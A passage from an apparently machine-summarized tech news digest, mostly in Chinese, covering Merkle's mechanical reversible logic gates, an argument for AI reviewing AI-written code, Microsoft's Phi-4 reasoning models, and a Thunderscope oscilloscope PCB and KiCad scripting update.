  • 平衡(Balance):确保二进制表示(“1”或“0”线路始终有一条接合)。由两个锁和一个杠杆组成。在时钟前沿,通过未接合的锁强制水平平移。用户可单独接合锁并启动时钟信号,时钟将流过未锁定的路径。

  • 曲柄杠杆(Bellcrank):用于路由和分裂信号,结构简单,便于构建逻辑门。

NAND门构建与模拟

利用上述组件可构建NAND门(通用门,能实现任何真值表)。每个输入(A和B)使用两条线路表示真值。每个输入线路接合两个锁,限制时钟流动。四条路径中,仅一条路径在计算时未锁定,当时钟信号到达时,该路径获得推力,输出结果。

模拟提供交互式演示:用户可设置时钟、输入A和B,查看计算结果(如真值表)。方程显示输入与输出的逻辑关系,模拟输出应与预期一致。

总结与进一步资源

这种机械可逆计算方案展示了在理论能效极限下的计算方式,组件结构简单且具有通用性。作者Ralph Merkle在一次研讨会中进一步概述了该主题,提供了详细讲解视频。

39. AI code review: Should the author be the reviewer? (www.greptile.com)

AI代码审查:作者是否应该成为审查者?

核心问题

随着AI工具(如Devin)在代码编写中日益普及,一个根本问题浮现:AI生成的代码是否应由AI自身进行审查?传统软件开发中,作者与审查者分离是为了确保代码获得新的视角,避免自我审查的盲点。

支持AI审查AI代码的论点

  1. 无状态性:大型语言模型(LLM)的API调用是无状态的,每次推理都是全新的。因此,AI审查自己的代码实际上是在用“全新的眼光”看待它。
  2. 脚手架差异:即使使用相同的底层LLM,不同的AI工具(如代码生成器与代码审查器)具有完全不同的工作流和上下文检索机制,本质上是两个不同的系统。
  3. 人类之间的相似性:在人工智能时代之前,作者和审查者虽为不同个体,但拥有相似的大脑结构、共享的知识背景和公司上下文,其差异可能并不比两个AI工具之间更大。

AI代码的质量特点

  • 对优秀工程师的影响:AI可能降低他们编写代码的平均质量。原因在于:(1) 使用提示词(prompt)传达需求存在信息损失;(2) 工程师倾向于低估这种损失,并且由于AI生成速度过快,无法像自己编码时那样进行实时的、逐行审查。
  • 对普通工程师的影响:AI实际上可能提高他们代码的质量,导致优秀工程师与普通工程师的代码质量趋向中位数。
  • AI生成代码的缺陷:AI生成的代码通常包含更多非典型的bug(例如意外更改未指定的代码行),这些bug往往不是人类会犯的错误。

AI在发现bug方面的优势

  • 人类在代码审查中并不擅长发现bug,审查更多是关于风格、模式或架构的检查。
  • 研究表明,在“困难”级别的bug检测基准测试中,先进的AI模型(如Claude Sonnet)表现优于人类工程师。例如,在一个包含209个困难bug的测试中,AI模型正确识别了32个,而任何人类工程师最多只能识别5-7个。

结论

文章认为,尽管存在顾虑,但基于AI的无状态性、与作者工具的差异性,以及其在检测特定类型bug上超越人类的能力,使用AI来审查AI生成的代码不仅是可行的,甚至可能是更有效的。作者承认其公司销售AI代码审查工具,但强调该观点源于对AI代码审查内在逻辑的诚实分析。

40. Phi-4 Reasoning Models (azure.microsoft.com)

微软发布了Phi-4推理模型系列,包括Phi-4-reasoningPhi-4-reasoning-plusPhi-4-mini-reasoning,标志着小语言模型在复杂推理能力上的新突破。

这些模型通过监督微调、强化学习和高质量数据训练,实现了在低延迟环境中执行多步推理任务的能力。尽管参数规模较小,其在数学、科学和编码等基准测试中的性能媲美甚至超越了大型前沿模型。

Phi-4-reasoning 是一个140亿参数的开源模型,通过监督微调实现复杂推理链生成。Phi-4-reasoning-plus 在此基础上通过强化学习进一步提升精度,使用更多推理时计算。两者在AIME 2025等测试中超越了参数量达6710亿的DeepSeek-R1模型。

Phi-4-mini-reasoning 针对资源受限环境优化,专注于数学推理,适用于教育、嵌入式辅导和边缘设备部署。它经过超百万个数学问题训练,性能接近OpenAI o1-mini,且优于多款更大规模的模型。

这些模型已集成到Windows生态系统,可在Copilot+ PC的NPU上本地运行,提供高效低耗的推理能力,并应用于Outlook等生产力工具中。

微软强调,所有Phi模型均遵循负责任的AI原则,采用多种技术确保安全性和可靠性。用户可通过Azure AI Foundry和HuggingFace访问这些模型。

43. The term "vegetative electron microscopy" keeps showing up in scientific papers (www.sciencealert.com)

Earlier this year, scientists discovered a peculiar term appearing in published papers: "vegetative electron microscopy".

45. Liverpool's title win has completed a mysterious Fibonacci sequence (www.bbc.com)

Liverpool FC's victory at the weekend has produced a strange series of numbers in the league's record books.

48. Thunderscope update: My take: Why open source is better (www.crowdsupply.com)

Thunderscope 项目更新:开源优势、设计与延期说明

PCB 设计进展(Rev 5)

作者在过去一个半月专注于 Rev 5 的 PCB 布局,追求尽善尽美。重点成果包括:

  • 高密度集成:将 ADC、时钟发生器、FPGA 及其电源模块均布局在散热器下方,并增加弹簧夹使散热器兼作屏蔽罩。
  • 前端电路测试设计:四个通道前端布局略有不同,用于测试接地方式和接地层切割对衰减器电路的影响。CH1 采用实心灌铜,其余通道接地层切割逐渐减少。
  • 过孔缝合:在前端区域添加过孔缝合,以改善因层数变化导致的接地参考不稳定和频率响应波动。
  • 可调电容重引入:重新加入可调电容(C1059),用于校准缓冲器随器件而异的寄生电容(约2.4 pF),以提升新设计的精度。

KiCad 脚本开发:延迟匹配工具

针对 KiCad 原生仅支持长度匹配、无法准确进行延迟匹配的问题,作者开发了定制脚本:

  • 问题背景:内层信号比外层慢,导致仅按长度匹配会产生延迟误差。
  • 解决方案:脚本通过重写设计规则,尝试将长度匹配转换为延迟匹配(包含焊盘延迟),用于 PCIe 通道等高速信号布线。
  • 工具效果:虽与 KiCad 报告的长度略有偏差,但延迟差异一致性良好,已实际用于项目布线调优。脚本已开源至 GitHub 仓库

延期说明与后续计划

  • 延期原因:新中间板设计、切换至 KiCad 以及个人问题导致原定时间表无法实现。
  • 当前进度与时间表
    1. Rev 5 原型:4月底收到 PCB,预计1-2天内手工组装,随后进行不超过两周的测试。
    2. 开发版生产:若 Rev 5 测试通过,将送 PCB 厂组装,预计7月交付开发版给支持者。
    3. 量产版计划:开发版交付一个月后开始生产,预计9月发货。
  • 透明度措施:使用 GitHub Issues 公开跟踪任务进度,并可通过 Crowd Supply、Discord(桥接至 Matrix/IRC)或 Mastodon 联系作者获取最新信息。

作者承诺将在 Rev 5 测试完成后发布进一步更新,确认最终时间表。